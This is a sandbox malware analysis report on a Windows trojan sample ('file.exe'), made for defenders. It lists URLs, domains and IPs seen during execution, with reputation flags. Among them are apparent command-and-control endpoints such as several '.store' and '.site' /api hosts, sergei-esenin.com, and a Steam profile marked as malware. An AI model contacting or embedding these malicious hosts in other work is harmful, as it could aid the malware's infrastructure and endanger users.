    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%URL Reputationsafe
    https://recaptcha.net/recaptcha/;0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%URL Reputationsafe
    https://store.steampowered.com/stats/0%URL Reputationsafe
    https://medal.tv0%URL Reputationsafe
    https://broadcast.st.dl.eccdnx.com0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
    https://store.steampowered.com/steam_refunds/0%URL Reputationsafe
    https://login.steampowered.com/0%URL Reputationsafe
    https://store.steampowered.com/legal/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
    https://recaptcha.net0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    https://store.steampowered.com/0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif0%URL Reputationsafe
    https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=9620160%URL Reputationsafe
    https://www.cloudflare.com/learning/access-management/phishing-attack/0%VirustotalBrowse
    https://bathdoomgaz.store:443/api22%VirustotalBrowse
    https://steamcommunity.com/?subsection=broadcasts0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp0%VirustotalBrowse
    https://www.youtube.com0%VirustotalBrowse
    studennotediw.store18%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPi0%VirustotalBrowse
    https://www.google.com0%VirustotalBrowse
    eaglepawnoy.store19%VirustotalBrowse
    https://sergei-esenin.com/0%VirustotalBrowse
    https://licendfilteo.site:443/api20%VirustotalBrowse
    https://sketchfab.com0%VirustotalBrowse
    https://sergei-esenin.com:443/api19%VirustotalBrowse
    https://www.cloudflare.com/5xx-error-landing0%VirustotalBrowse
    https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&a0%VirustotalBrowse
    dissapoiznw.store22%VirustotalBrowse
    https://www.google.com/recaptcha/0%VirustotalBrowse
    https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/0%VirustotalBrowse
    https://steamcommunity.com/market/0%VirustotalBrowse
    https://steamcommunity.com/my/wishlist/0%VirustotalBrowse
    https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%VirustotalBrowse
    https://steamcommunity.com/discussions/0%VirustotalBrowse
    https://dissapoiznw.store:443/api22%VirustotalBrowse
    https://sergei-esenin.com/016%VirustotalBrowse
    bathdoomgaz.store22%VirustotalBrowse
    https://www.youtube.com/0%VirustotalBrowse

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    steamcommunity.com
    		104.102.49.254
    		truetrueunknown
    sergei-esenin.com
    		104.21.53.8
    		truetrueunknown
    241.42.69.40.in-addr.arpa
    		unknown
    		unknownfalse
      		unknown
      eaglepawnoy.store
      		unknown
      		unknowntrueunknown
      bathdoomgaz.store
      		unknown
      		unknowntrueunknown
      spirittunek.store
      		unknown
      		unknowntrueunknown
      licendfilteo.site
      		unknown
      		unknowntrueunknown
      studennotediw.store
      		unknown
      		unknowntrueunknown
      mobbipenju.store
      		unknown
      		unknowntrueunknown
      clearancek.site
      		unknown
      		unknowntrueunknown
      dissapoiznw.store
      		unknown
      		unknowntrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      studennotediw.storetrueunknown
      dissapoiznw.storetrueunknown
      https://steamcommunity.com/profiles/76561199724331900true
      • URL Reputation: malware
      		unknown
      eaglepawnoy.storetrueunknown
      bathdoomgaz.storetrueunknown
      clearancek.sitetrue
        		unknown
        spirittunek.storetrue
          		unknown
          licendfilteo.sitetrue
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://www.cloudflare.com/learning/access-management/phishing-attack/file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749627824.0000000001326000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://player.vimeo.comfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5ffile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://bathdoomgaz.store:443/apifile.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://sergei-esenin.com/file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmptrueunknown
            https://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.gstatic.cn/recaptcha/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.valvesoftware.com/legal.htmfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.youtube.comfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.google.comfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://eaglepawnoy.store:443/apiPfile.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=hgPifile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://s.ytimg.com;file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://steam.tv/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://licendfilteo.site:443/apifile.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com:443/profiles/76561199724331900file.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                https://store.steampowered.com/points/shop/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://sketchfab.comfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://lv.queniujq.cnfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                https://www.youtube.com/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://store.steampowered.com/privacy_agreement/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                https://www.cloudflare.com/learning/access-managfile.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://www.cloudflare.com/5xx-error-landingfile.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749627824.0000000001326000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://sergei-esenin.com:443/apifile.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=2Ih2WOq7ErXY&afile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://www.google.com/recaptcha/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://checkout.steampowered.com/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://avatars.akamai.steamstaticfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://store.steampowered.com/;file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://store.steampowered.com/about/file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://steamcommunity.com/my/wishlist/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://help.steampowered.com/en/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://steamcommunity.com/market/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://store.steampowered.com/news/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://community.akamai.steamstatic.com/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://store.steampowered.com/subscriber_agreement/file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000000.00000003.1749512570.0000000001318000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://recaptcha.net/recaptcha/;file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://sergei-esenin.com/0file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmptrueunknown
                  https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  https://dissapoiznw.store:443/apifile.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://steamcommunity.com/discussions/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                  https://sergei-esenin.com/apiAfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmptrue
                    		unknown
                    https://store.steampowered.com/stats/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://medal.tvfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://broadcast.st.dl.eccdnx.comfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://store.steampowered.com/steam_refunds/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://sergei-esenin.com/apirt.cfile.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmptrue
                      		unknown
                      https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=jGtzAgjYROne&amp;l=efile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://clearancek.site:443/apifile.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://sergei-esenin.com/api0file.exe, 00000000.00000003.1749512570.00000000012C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmptrue
                              		unknown
                              https://steamcommunity.com/workshop/file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://login.steampowered.com/file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://store.steampowered.com/legal/file.exe, 00000000.00000002.1951560374.0000000001293000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://sergei-esenin.com/C:file.exe, 00000000.00000002.1951560374.00000000012B3000.00000004.00000020.00020000.00000000.sdmptrue
                                  		unknown
                                  https://recaptcha.netfile.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://upx.sf.netAmcache.hve.4.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://store.steampowered.com/file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://studennotediw.store:443/apifile.exe, 00000000.00000003.1749512570.000000000129E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1951560374.000000000129E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749512570.0000000001298000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://127.0.0.1:27060file.exe, 00000000.00000003.1743123008.00000000012D7000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000000.00000003.1743087878.000000000130D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1749477612.000000000131D000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      104.21.53.8
                                      		sergei-esenin.comUnited States
                                      		13335CLOUDFLARENETUStrue
                                      104.102.49.254
                                      		steamcommunity.comUnited States
                                      		16625AKAMAI-ASUStrue

                                      General Information

                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1532904
                                      Start date and time:2024-10-14 06:51:06 +02:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 5m 1s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:10
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:file.exe
                                      Detection:MAL
                                      Classification:mal100.troj.evad.winEXE@3/5@11/2
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 52.182.143.212
                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
